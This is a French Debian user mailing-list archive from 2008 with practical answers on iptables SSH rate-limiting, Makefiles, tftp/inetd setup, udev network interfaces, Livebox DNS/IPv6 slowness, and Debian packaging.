Bonsoir, François Cerbelle wrote: Le Mer 1 octobre 2008 14:45, Johan Dindaine a écrit : J'en ai tellement qu'a certain moment le flood ralenti ce serveur. Je me rappelle avoir deja vu sur la liste un programme permetant de banir une IP apres un certain nombres d'essaie mais je n'ai pu retrouver le nom. Pouvez vous me rappeler quel etait celui ci? Je suis surpris que personne n'ai proposé une autre solution bien plus rapide et légère : le module recent de iptables qui va limiter la fréquence des tentatives. Tu peux lui dire par exemple : pas plus de trois tentatives en 60 secondes, sinon on bloque l'IP pendant 60 secondes et on note ca, mais pas plus de 10 fois par minutes C'est direct dans le noyau, sans rien de plus qu'une simple règle. Tu verra les alertes passer, mais beaucoup moins souvent, elles ne chargeront pas tes logs et les trames TCP seront éliminées au plus bas niveau (donc moins de charge). iptables -A INPUT -p tcp --dport 22 -m state --state NEW -m recent --set --name SSH iptables -A INPUT -p tcp --dport 22 -m state --state NEW -m recent --update --seconds 60 --hitcount 3 --rttl --name SSH -m limit --limit 10/m -j LOG iptables -A INPUT -p tcp --dport 22 -m state --state NEW -m recent --update --seconds 60 --hitcount 3 --rttl --name SSH -j DROP # Accepter les connexions SSH iptables -A INPUT -p tcp -m tcp --dport 22 --syn -j ACCEPT Je viens de m'amuser à ressortir un petit script: # ./my_script.sh mercredi 1 octobre 2008, 20:10:28 (UTC+0200) diamond.example.com [192.168.0.1] 22 (ssh) open diamond.example.com [192.168.0.1] 22 (ssh) : Connection timed out diamond.example.com [192.168.0.1] 22 (ssh) : Connection timed out diamond.example.com [192.168.0.1] 22 (ssh) : Connection timed out diamond.example.com [192.168.0.1] 22 (ssh) : Connection timed out sent 0, rcvd 0 mercredi 1 octobre 2008, 20:10:32 (UTC+0200) ... diamond.example.com [192.168.0.1] 22 (ssh) open sent 0, rcvd 0 mercredi 1 octobre 2008, 20:10:32 (UTC+0200) Cela devrait rappeler quelque chose à François Boisson :p! C'est simplement pour mettre en évidence que le module recent gère une table pour lister les connexions mais que l'on peut atteindre ces limites très vite. Autrement, en effet c'est une solution simple et qui dépanne bien. -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE signature.asc Description: OpenPGP digital signature
Re: Bloquer les tentatives connexion ssh
mouss wrote: Johan Dindaine wrote: Bonjour la liste, Bonsoir, [...] fail2ban, denyhosts, etc mais bon, c'est de l'artillerie lourde en quelque sorte. il faut être conscient que ça consiste à faire tourner un programme privélgié (il faut qu'il puisse reconfigurer le firewall) qui réagit à des expressions régulières. Je ne pense vraiment pas que l'on puisse considérer fail2ban, denyhost comme de l'artillerie lourde. Pour moi, ce serait plutôt quelque chose comme le triplet psad, fwsnort et fwknop sur une machine qui commence à vraiment devenir amusant. [...] si tu te sens droit dans tes bottes, alors ignore les attaques en te disant c'est sécurisé ici, on s'en moque des tentatives. Après tout, il n'y a pas de raison de trembler toute sa vie durant. Les ignorer entièrement n'apporte rien à personne, il peut-être intéressant de les prendre en compte et de les reporter à un niveau supérieur: http://www.dshield.org/indexd.html -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE signature.asc Description: OpenPGP digital signature
Re: [HS] Makefile
Salut, [...] avec les wildcards je me retrouve par ex. avec OBJ=toto.o src/titi.o et du coup quand on rajoute $(OBJPATH) ça ne s'applique que à toto.o et donc il ne trouve pas titi.o Ce qui me crée des .o dans ./src/ Si je rajoute ce que tu m'indiques ça me crée bien les .o dans ./obj/ et ./obj/src (à condition que je crée cette arbo avant). Mais ensuite pour le link ça ne marche pas. J'ai essayé de modifier en $(EXEC): $(OBJ) @$(CC) -o $(OBJ_PATH)$@ $^ $(LDFLAGS) mais sans succès. Je n'ai pas la solution sous le coude, il faut que je teste. Je regarde cela un peu plus tard et je te tiens au courant -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE signature.asc Description: OpenPGP digital signature
Re: [HS] Makefile
[...] Moi j'ai un truc du genre: ./inc/*.h ./src/*.c ./*.c ./Makefile Je ne veux pas polluer ./inc et ./src J'ai créer des modules config, daemon, cmdline ... pour le programme principal fwknop (fwknopd). [code] $ find . . ./config ./config/config.h ./config/config.c ./daemon ./daemon/daemon.h ./daemon/daemon.c ./fwknop ./fwknop/fwknop.h ./fwknop/fwknop.c ./fwknop/stdtypes.h ./Makefile ./cmdline ./cmdline/cmdline.c ./cmdline/cmdline.h ./net ./net/net.h ./net/net.c $ make all rm -f *.o gcc -Wall -O0 -D__DEBUG -I daemon -I config -I net -I cmdline \ -I fwknop -c fwknop/fwknop.c -o fwknop.o gcc -Wall -O0 -D__DEBUG -I daemon -I config -I net -I cmdline \ -I fwknop -c config/config.c -o config.o gcc -Wall -O0 -D__DEBUG -I daemon -I config -I net -I cmdline \ -I fwknop -c daemon/daemon.c -o daemon.o gcc -Wall -O0 -D__DEBUG -I daemon -I config -I net -I cmdline \ -I fwknop -c net/net.c -o net.o gcc -Wall -O0 -D__DEBUG -I daemon -I config -I net -I cmdline \ -I fwknop -c cmdline/cmdline.c -o cmdline.o gcc fwknop.o config.o daemon.o net.o cmdline.o -o fwknopd [/code] Avec un Makefile comme ceci: Normalement je mets tous les headers dans le même répertoire mais je voulais essayer de cette façon. [quote=Makefile] CC = gcc CFLAGS = -Wall -O0 -D__DEBUG HEADERS = -I daemon -I config -I net -I cmdline -I fwknop PROGRAM = fwknopd vpath %.c cmdline:config:net:daemon:fwknop %.o: %.c $(CC) $(CFLAGS) $(HEADERS) -c $ -o $@ $(PROGRAM): fwknop.o config.o daemon.o net.o cmdline.o $(CC) $^ -o $@ clean: rm -f *.o clean_all: clean rm -f $(PROGRAM) all: clean $(PROGRAM) .PHONY: clean clean_all all [/quote] Donc à priori je dirais que la seule chose que tu as à changer ce sont les variables. J'espère que c'est le bon ce coup ci. Je n'ai pas créé de répertoire objets car je ne m'en sort avec mon Makefile autrement. Donc tous les .o arriveront à la racine où se trouve le Makefile. -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE signature.asc Description: OpenPGP digital signature
Re: [HS] Makefile
Gaëtan PERRIER wrote: Bonjour, Bonsoir, Je me pose une question sur les Makefile. J'ai une arbo qui contient des sources et je lance le make, les .o sont créés dans l'arbo. J'aurai aimé qu'ils soient tous mis à un endroit bien précis. Est-ce possible? CC = gcc CFLAGS = -g -O0 -Wall SRCPATH = ./ OBJPATH = ./obj/ %.o: %.c $(CC) $(CFLAGS) -c $(SRCPATH)$ -o $(OBJPATH)$@ Voila un bout de ce que j'ai sous la main. Soit les fichiers sources à la racine obtiennent leur fichiers .o dans le répertoire obj. -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE signature.asc Description: OpenPGP digital signature
Re: [HS] Makefile
Gaëtan PERRIER wrote: Le Fri, 26 Sep 2008 21:22:55 +0200 Franck Joncourt [EMAIL PROTECTED] a écrit: [...] Merci pour ta réponse rapide mais ensuite tu fais comment pour le link? De plus il faut recréer l'arbo source dans ./obj sinon ça ne fonctionne pas, non? Moi j'ai un truc du genre: ./inc/*.h ./src/*.c ./*.c ./Makefile Je ne veux pas polluer ./inc et ./src J'ai donc commencé avec un Makefile du genre: CC=gcc CFLAGS=-W -Wall -ggdb3 LDFLAGS= EXEC=mon_prog SRC= $(wildcard *.c) SRC+=$(wildcard src/*.c) OBJ= $(SRC:.c=.o) INC_PATH=./itf/:./inc/ all: $(EXEC) $(EXEC): $(OBJ) @$(CC) -o $@ $^ $(LDFLAGS) %.o: %.c @C_INCLUDE_PATH=$(INC_PATH) $(CC) -o $@ -c $ $(CFLAGS) Quelque chose du genre: SRCPATH = ./ OBJPATH = ./obj/ %.o: %.c $(CC) $(CFLAGS) -c $(SRCPATH)$ -o $(OBJPATH)$@ mon_prog: ma liste_de _fichier_o $(CC) $(LDFLAGS) $(OBJPATH)* -o $(HEXPATH)$@ Je n'ai jamais utilisé les wilcards auparavant. Va falloir que je creuse. Ce qui me crée des .o dans ./src/ Si je rajoute ce que tu m'indiques ça me crée bien les .o dans ./obj/ et ./obj/src (à condition que je crée cette arbo avant). Mais ensuite pour le link ça ne marche pas. J'ai essayé de modifier en $(EXEC): $(OBJ) @$(CC) -o $(OBJ_PATH)$@ $^ $(LDFLAGS) mais sans succès. -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE signature.asc Description: OpenPGP digital signature
Re: /dev/eth a disparu ???
Sylvain Sauvage a écrit : Jean-Michel OLTRA, lundi 22 septembre 2008, 07:18:52 CEST Bonjour, Le lundi 22 septembre 2008, Laurent Guignard a écrit... Je viens de voir un truc c'est que /dev/ethX a disparu mais le réseau fonctionne correctement pour tous les logiciels clients. Mais dès que je veux passer l'interface en mode promiscious j'ai un beau message ioctl(SIOCGARP): No such device. Je n'ai pas non plus de /dev/ethX, et l'interface entre bien en mode « promiscuous » puisque je peux faire un tcpdump dessus. Ce n'est donc pas forcément à ce niveau que se situe le problème. Le noyau Linux n’a jamais utilisé /dev/eth. Ces fichiers ont parfois été créés mais n’ont jamais été utilisés. (Les seuls /dev/ utilisés pour le réseau sont les /dev/tun.) A vrai dire moi j'obtiens les informations sur mes cartes réseaux depuis le chemin suivant: /sys/class/net/ma_carte_reseau avec l'utilisation de # udevinfo -a -p le_chemin Si cela peut aider. « device » ne signifie pas forcément « fichier dans /dev ». Bon, ça n’explique pas pourquoi la carte ne passe pas en « promiscuous »… Bonne journee. --- Franck -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: IPV6 livebox lenteur affichage browser
Bonjour, Kevin Hinault wrote: Dans /etc/ resolv.conf est un lien vers /etc/resolvconf/run/resolv.conf et j'ai l'impression qu'il se régénère automatiquement a chaque reboot, donc j'ai hésité a le modifier. Oui le resolv.conf est tout le temps regénéré après une requête DHCP. C'est pour cela que j'avais précédemment mentionné le fait de retirer l'option __domain-name-servers__ du fichier /etc/dhcp3/dhclient.conf. Mais semble t'il personne n'y a prêté attention. Pour ma part, je n'ai pas à modifier mon resolv.conf seul les forwarders sur mon serveur DNS. -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE signature.asc Description: OpenPGP digital signature
Re: IPV6 livebox lenteur affichage browser
[...] Dans /etc/ resolv.conf est un lien vers /etc/resolvconf/run/resolv.conf et j'ai l'impression qu'il se régénère automatiquement a chaque reboot, donc j'ai hésité a le modifier. Oui le resolv.conf est tout le temps regénéré après une requête DHCP. C'est pour cela que j'avais précédemment mentionné le fait de retirer l'option __domain-name-servers__ du fichier /etc/dhcp3/dhclient.conf. Mais semble t'il personne n'y a prêté attention. MeaMaxima Culpa ;-) Je m'en vais essayer en rechargeant le module IPV6 et en enlevant cette option de dhclient.conf. 1- j'ai de-blackliste le module ipv6 2- j'ai desactive/supprimé l'option __domain-name-servers__ 3- j'ai rebooté et le navigateur c'est remis a ramer pas possible [..] 1- j'ai reblacklisté ipv6 2- reboot et là le navigateur est repassé en formule 1 :-)) Explication ? je n'y comprend rien mais sa marche Je viens de vérifier en déconfigurant un de mes postes, et il n'y a aucun doute cela fonctionne correctement. Le fait d'enlever la directive domain-name-servers fait que je ne récupère pas le serveur DNS proposé par mon serveur DHCP. C'est le même principe que pour le MTU, le serveur ntp ... Du coup, si j'indique la livebox en nameserver sur mon poste client, ça rame, et si j'y place les serveurs orange, je passe en mode formule 1 comme tu dis. (à condition d'autoriser le traffic DNS des clients vers l'extérieur). As tu vérifier à quoi ressemblait ton fichier resolv.conf avant et après que ton interface soit montée. Les serveurs orange y sont-ils bien spécifiés, le fichier resolv.conf reste-t-il non modifié ... Tu peux aussi sniffer le réseau et regarder vers qui vont les requêtes DNS. -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE signature.asc Description: OpenPGP digital signature
Re: booter sans disque dur
Bonsoir, Revolver Onslaught wrote: Merci pour ce petit tuto ;o) Je suis tombé sur ce site tout à l'heure : http://fsabourin.blogspot.com/2007/09/installation-ubuntudebian-avec-pxe.html Je pense avoir compris une partie du problème : j'ai proftpd qui tourne également pour mon serveur ftp : # /etc/init.d/tftpd-hpa start Sep 21 18:15:50 neptune in.tftpd[4643]: cannot bind to local socket: Address already in use Je pense que ça vient de là. J'avais essayé de changer le port de tftpd mais sans succès... Une idée ? C'est quoi le rapport entre ton serveur ftp et tftp ? Ils ne fonctionnent pas sur le même port par défaut. Le tftp c'est sur le port 69 en udp. Regardes quel processus tourne sur le port tftp. # netstat -lup | grep tftp pour connaitre le responsable. -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE signature.asc Description: OpenPGP digital signature
Re: IPV6 livebox lenteur affichage browser
Bonsoir, Hier il y a eu une mise a jour automatique du logiciel de la livebox. La nouvelle version 3202_26014A provoque un ralentissement important po= ur se=20 connecter a un serveur 30 secondes et plus. Recherche sur internet et tout le monde accuse IPV6. J'ai appliqu=E9 plusieurs solutions pr=E9conis=E9es. Pour Firefox : about:config et puis dans le filtre, tapez: ipv6 Vous verrez la variable network.dns.disableIPv6 Passez sa valeur =E0 = true pour=20 d=E9sactiver le support IPv6 dans Firefox. Et sa marche. Mais pour Konqueror il n'y a rien. Alors dans /etc/hosts commenter les lignes aff=E9rentes a ipv6 ne sert= a rien Alors dans /etc/modprobe.d/aliases mettre blacklist ipv6 ne sert a r= ien. =20 Et lsmod | grep ipv6 indique que ce module est pr=E9sent mais on ne peu= t=20 l'enlever car il est utilis=E9. Alors, dans /etc/modprobe.d/blacklist j'ai ajout=E9blacklist ipv6= et =20 l=E0... sa marche apr=E9s avoir rebot=E9. Konqueror gagne 95 pour cent de vitesse. Firefox est aussi acc=E9l=E9r=E9= =2E Moi, j'ai opt=E9 pour la modification DNS suite aux logs de mon serveur. Je forwardais les requ=EAtes DNS =E0 la livebox, mais maintenant c'est directement aux serveurs orange. Quant =E0 savoir exactement pourquoi, je ne m'y suis pas int=E9ress=E9 pl= us que cel=E0 ; c'est une livebox :p! --=20 Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE signature.asc Description: OpenPGP digital signature
Re: booter sans disque dur
[...] La commande renvoie ceci: [EMAIL PROTECTED]:/root# netstat -lup | grep tftp udp0 0 *:tftp *:* 3614/inetd Ca t'éclaire ? Pour ma part, ça reste flou... Je dirais bien: Stopper le service openbsd-inetd Retirer la ligne incriminer dans /etc/inetd.conf Redémarrer le service. A voire. -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE signature.asc Description: OpenPGP digital signature
Re: IPV6 livebox lenteur affichage browser
Désolé, un bug avec thunderbird. -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE signature.asc Description: OpenPGP digital signature
Re: booter sans disque dur
Bonsoir, Kevin Hinault wrote: Si son serveur tftp est géré par inet.d il ne devrait pas avoir besoin de l'enlever de la conf puisque inet.d fera le relais vers tftpd. [...] Il me semblait avoir lu qu'il faisait un start du service quelque part, et donc qu'il ne travaillait pas avec inetd. C'est pour cela que je le propose. PS1: Je suis inscrit à la liste ; pas besoin de me mettre en copie. PS2: Eviter le top posting :p! -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE signature.asc Description: OpenPGP digital signature
Re: booter sans disque dur
A priori, le souci est là: je n'arrive pas à récupèrer le fichier par tftp [EMAIL PROTECTED]:/var/lib/tftpboot# essai.txt [EMAIL PROTECTED]:/var/lib/tftpboot# exit [EMAIL PROTECTED]:~$ tftp localhost tftp get essai.txt Transfer timed out. tftp quit [EMAIL PROTECTED]:~$ tftp 127.0.0.1 tftp get essai.txt Transfer timed out. # ps aux|grep tftp nobody5567 0.0 0.0 14548 744 ?Ss 20:01 0:00 in.tftpd /var/lib/tftpboot [...] Donc la tu as bien mis tftpd en standalone dans inetd ? (ce que préconisait franck) Soit il fonctionne en standalone soit via inetd. Je pense que c'est ce que tu voulais dire. Pour le fonctionnement en standalone il faut l'autoriser /etc/default/ $ cat /etc/default/tftpd-hpa #Defaults for tftpd-hpa RUN_DAEMON=yes OPTIONS=-l -s /var/lib/tftpboot et ensuite lancer le service: # /etc/init.d/tftpd-hap start Le address already in use vient, semble t-il, bien d'un problème avec le lancement en standalone et vie inetd. (cf /var/log/syslog) Le fonctionnement via inetd est celui par défaut, il n'y a rien a changé. Ce qui m'intrigue c'est le user nobody qui traine dans la commande ps. Par défaut le serveur se lance en tant que user nobody, et même avec l'option -m nobody mon serveur est toujours lancé avec root. Donc tu lances le serveur comment ? -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE signature.asc Description: OpenPGP digital signature
Re: noyau en trop ?
Bonsoir, Shubbaka wrote: Alors, oui tu décommentes les lignes de menu.lst pour le noyau que tu veux garder. Vérifier que le vmlinuz correspond bien à celui dans /boot. Donc à mon avis ce sont les deux blocs d'en bas à garder. Je viens de regarder mon menu.lst, le Default qu'il y a dans le tien est là pour info je pense, si tu en lèves les 2 premiers blocs le 2.6.26 sera donc en premier et le défaut (pour plus d'info sur grub, man grub dans un terminal). Pour que tout fonctionne il faut bien (je me répète...) que les lignes #kernel/boot/vmlinuz root=/dev/sda1 ro #initrd/boot/initrd.img correspondent aux fichiers que tu as dans /boot (les extensions -2.6). update-grub ne pourrait-il pas vous aider à faire le ménage dans le menu.lst en fonction de ce qu'il y a dans /boot ? -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE signature.asc Description: OpenPGP digital signature
Re: booter sans disque dur
[...] Oui, tftp est lancé par inetd: [EMAIL PROTECTED]:~# grep tftp /etc/inetd.conf tftpdgram udp waitnobody /usr/sbin/tcpd /usr/sbin/in.tftpd /var/lib/tftpboot Comme le préconisait Franck commente cette ligne, relance inetd et relance tftpd. C'était principalement à cause du conflit avec le mode standalone. Mais si il veut utiliser inetd, voila ce que j'ai dans mon inetd.conf: [code] tftp dgram udp waitroot /usr/sbin/in.tftpd /usr/sbin/in.tftpd -s /var/lib/tftpboot [/code] Pour moi, c'est ton user nobody qui coince. Et on relance openbsd-inetd autrement tu as un timeout sur la commande get. [...] -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE signature.asc Description: OpenPGP digital signature
Re: noyau en trop ?
Shubbaka wrote: Franck Joncourt a écrit : update-grub ne pourrait-il pas vous aider à faire le ménage dans le menu.lst en fonction de ce qu'il y a dans /boot ? Certes, grub étant malin, il se met aussi à jour lorsque qu'un noyau est installé, enlevé, mis à jour. Le ménage se fait-il si on a modifié manuellement menu.lst (comme commenter des lignes) ? Il peut essayer. Il m'est arrivé de supprimer les fichiers du répertoire /boot et de devoir recompiler un noyau trois jour après pour pouvoir rebooter :) J'admets j'ai un peu croisé les doigts. Il y a toujours moyen de s'en sortir. -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE signature.asc Description: OpenPGP digital signature
Re: /dev/eth a disparu ???
Laurent Guignard wrote: François Boisson a écrit : Je viens de voir un truc c'est que /dev/ethX a disparu mais le réseau fonctionne correctement pour tous les logiciels clients. Mais dès que je veux passer l'interface en mode promiscious j'ai un beau message ioctl(SIOCGARP): No such device. Pour ceux que ça intéresse je veux pouvoir utiliser le programme dhcp_probe (http://www.net.princeton.edu/software/dhcp_probe/)... Je suppose que le programme cherche le fichier /dev/ethX de mon interface alors si vous avez la solution je suis preneur ;) [...] $ grep eth /etc/udev/rules.d/z25_persistent-net.rules grep eth /etc/udev/rules.d/z25_persistent-net.rules 8:SUBSYSTEM==net, DRIVERS==?*, ATTRS{address}==00:c0:9f:00:00:82:e7:7f, NAME=eth0 11:SUBSYSTEM==net, DRIVERS==?*, ATTRS{address}==00:10:35:0a:cc:76, NAME=eth1 14:SUBSYSTEM==net, DRIVERS==?*, ATTRS{address}==00:00:10:10:c1:ae, NAME=eth2 17:SUBSYSTEM==net, DRIVERS==?*, ATTRS{address}==00:00:10:0c:e2:12, NAME=eth3 Le truc que je comprends pas bien c'est que j'ai le réseau puisque je vous écris depuis le PC en question... Je ne sais pas où est le point d'entrée de chacun de mes périphériques réseau dans le filesystem... Sinon pour mon problème je pense plus à un problème d'accès à la table arp (même si la commande arp fonctionne bien) ou alors à un problème de passage de l'interface réseau en mode promiscious (et je suis bien root pour pouvoir faire cela). Là je vois pas car avec le passage à udev j'ai pas trop suivi !! Moi je pencherais pour udev comme François. Pourrais tu fournir le retour de la commande __ifconfig -a__ en plus ? Merci. -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE signature.asc Description: OpenPGP digital signature
Re: connexion internet lente avec mise ajour livebox
katukav wrote: Bonjour Bonsoir, [...] # Arguments to be passed to the DHCP client daemon # DHCPCD_ARGS=-R -t 30 -h $HOSTNAME Je ne trouve pas cette der niére partie et peut etre il y' un moyen plus propre pour affecter des DNS precis. Le lien du forum : http://www.siteduzero.com/forum-83-285828-2604746-temps-de-reponse-internet-anormalement-long.html Moi j'aurais enlevé l'entrée domain-name-servers du fichier /etc/dhcp3/dhcpclient.conf. Je pense que cela devrait suffire. -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE signature.asc Description: OpenPGP digital signature
Re: Réalisation d'un package.
François Cerbelle wrote: Zuthos a écrit : [...] Bonsoir, dpkg-deb : construction du paquet « coco » dans [...] voila, si quelqu'un a une idée. Merci d'avance Oui, essaye de configurer tes variables d'environnement : export [EMAIL PROTECTED] export DEBFULLNAME=Oddy Zuthos Et ca devrait aller mieux... Sinon, tu peux désactiver la signature des paquets avec les options -us -uc [code] dpkg-buildpackage -rfakeroot -kzuthos [/code] Je te laisse regarder la manpage :)! -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE signature.asc Description: OpenPGP digital signature
Re: Réalisation d'un package.
François Cerbelle wrote: Franck Joncourt a écrit : [..] Je te laisse regarder la manpage :)! Sur ce coup, c'est un peu rude... Rude ? J'ai précisé l'option k. Il n'y a plus qu'à lire la manpage en cherchant l'option -k et il trouvera plus d'informations/précisions. En tout cas ce n'était pas mon intention d'être rude. Il faut lire plusieurs pages de man (dpkg-*, dpkg, apt, ...) qui sont longues, plus les manuels de mainteneur, developpeur... Pour avoir une bonne vision. Du moins, c'est ce qu'il m'a fallut faire. Devenir Debian Maitainer/Developer cela prend du temps ... PS: je suis inscrit à la liste pas besoin de me mettre en cc. -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE signature.asc Description: OpenPGP digital signature
Re: Bind Sarge, était: Rappel : il est URGEN T de mettre à jour les serveurs DNS récursifs , si ce n'est pas déjà fait
Sylvain Sauvage wrote: Franck Joncourt, mercredi 23 juillet 2008, 23:16:03 CEST [...] http://www.cipherdyne.org/blog/2008/07/mitigating-dns-cache-poisoning-att= acks-with-iptables.html Moi j’aurais plutôt dit : « Au pire, tu mets à jour vers Etch » :oP C'est aussi une solution envisageable en effet :p! mais moins intéressante. [...] [Franck, il semble que (ton ?) Thunderbird n’indique pas que le texte est en Quoted-printable, c’est… gênant.] J'ai fait des tests pour vérifier et il semble que j'ai fait une fausse manipulation la dernière fois. Je serais fixé avec ce mail. Merci de votre compréhension. -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE signature.asc Description: OpenPGP digital signature
Re: Rappel : il est URGENT de mettre à jour les serveurs DNS récursifs, si ce n'est pas déjà fait
gens qui g=E8rent des serveurs DNS. Si ce n'est pas le cas, vous pouve= z au moins tester celui de votre FAI. Debian a eu les mises =E0 jour n=E9cessaires d=E8s le premier jour donc 'aptitude install XXX' suffit= , o=F9 XXX est le logiciel utilis=E9.] [...] Quel est la solution pour les seveurs en Sarge? =20 [EMAIL PROTECTED]:~$ apt-cache policy bind9 bind9: Install=E9 : 1:9.2.4-1sarge3 Candidat : 1:9.2.4-1sarge3 Table de version : *** 1:9.2.4-1sarge3 0 500 ftp://ftp2.de.debian.org sarge/main Packages 500 http://security.debian.org sarge/updates/main Packages 100 /var/lib/dpkg/status =20 Au pire, tu mets en place une r=E8gles iptables pour rendre le port sourc= e al=E9atoire pour les requ=EAtes DNS et tu joues sur la dur=E9e des connex= ions udp au niveau de netfilter si n=E9cessaire. http://www.cipherdyne.org/blog/2008/07/mitigating-dns-cache-poisoning-att= acks-with-iptables.html --=20 Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE signature.asc Description: OpenPGP digital signature
Re: Pare-feu : ouverture de ports à reception d' un mail
Romaric Defaux a écrit : Bonjour, Bonjour, Je ne réponds pas directement à ta question, mais il existe des outils pour contrer le brute-force (Si c'est bien d'attaques de brute-force dont tu parles). Perso, j'utilise fail2ban, ce qui permet de bloquer les attaques de brute-force sur pas mal de services (SSH, SMTP, IMAP, POP, ...) Utilises le couple fwsnort, psad et fwknop. L'auteur explique mieux que moi comment cela fonctionne donc voici un lien : http://cipherdyne.org/ Si tu as des questions je reste quand même à disposition. Psad vient d'être mis à jour dans les dépôts Debian et pour ce qui est de fwknop et fwsnort, je viens de finir l'empaquetage ; ils devraient arriver d'ici peu dans les dépôts. Si tu veux les essayer, je peux te fournir les paquets Debian. Bonne journée, -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/DebFrFrenchLists Vous pouvez aussi ajouter le mot ``spam'' dans vos champs From et Reply-To: To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: reboot intempestif, pbs avec iceweasel de Sid ??
Jean-Yves F. Barbier wrote: Bruno Magagnini a écrit : Salut, [...] sinon, j'ai eu aussi des soucis de reboot, c'était l'alimentation qui posait problème. wai, ça arrive aussi, mais c'est bcp plus rare (souvent avec les alims bas de gamme) Tu fais bien d'en parler, un de mes serveurs de mails a lâché comme cela avant hier :)! Un vieux coucou. Au passage pour memtest, on est pas obligé de le graver. La dernière fois que je l'ai utilisé je l'ai installé (apt-get), et mis à jour grub. Il suffit ensuite de rebooter et de le sélectionner à l'invite. Bonne fin de soirée. -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE signature.asc Description: OpenPGP digital signature
Re: reboot intempestif, pbs avec iceweasel de Sid ??
Jérôme wrote: Le jeudi 26 juin 2008 à 21:31 +0200, Jean-Michel OLTRA a écrit : [...] En cas général sur ces composants a gravure fine, donc très sensibles: - ne pas opérer sur la moquette, - encore moins assis sur un siège recouvert de synthétique. - préférer les bas en soie ;) et ne pas hésiter à enlever ses chaussures à semelles isolantes. - Eteindre le pc avec le bouton de l'alimentation. - Toucher la carosserie et garder le contact avant de sortir la barette de l'emballage anti-statique. - Eviter de toucher les contact, en dehors de la statique, la transpiration est acide et n'améliore pas les contacts (caractéristique avec les piles de montres qu'il ne faut jamais toucher avec les doigts). Bref, avec un peu de parano, les pannes aléatoires sont beaucoup moins fréquentes. Il existe aussi des bracelets anti-statique et des talonnettes. Je manipule des composants tous les jours, que ce soient des cartes électroniques entières ou des composants cms, et jusqu'à présent je n'ai rien cassé ; je pense donc que cela est surtout un coup de pas de chance quand cela arrive. Mais bon, je changerais peut-être d'avis dans peu de temps :p! -- Franck Joncourt http://debian.org - http://smhteam.info/wiki/ Fingerprint : C10E D1D0 EF70 0A2A CACF 9A3C C490 534E 75C0 89FE signature.asc Description: OpenPGP digital signature
Re: [contourné (mais pas résolu)] mise à jour de vlc: probleme divx
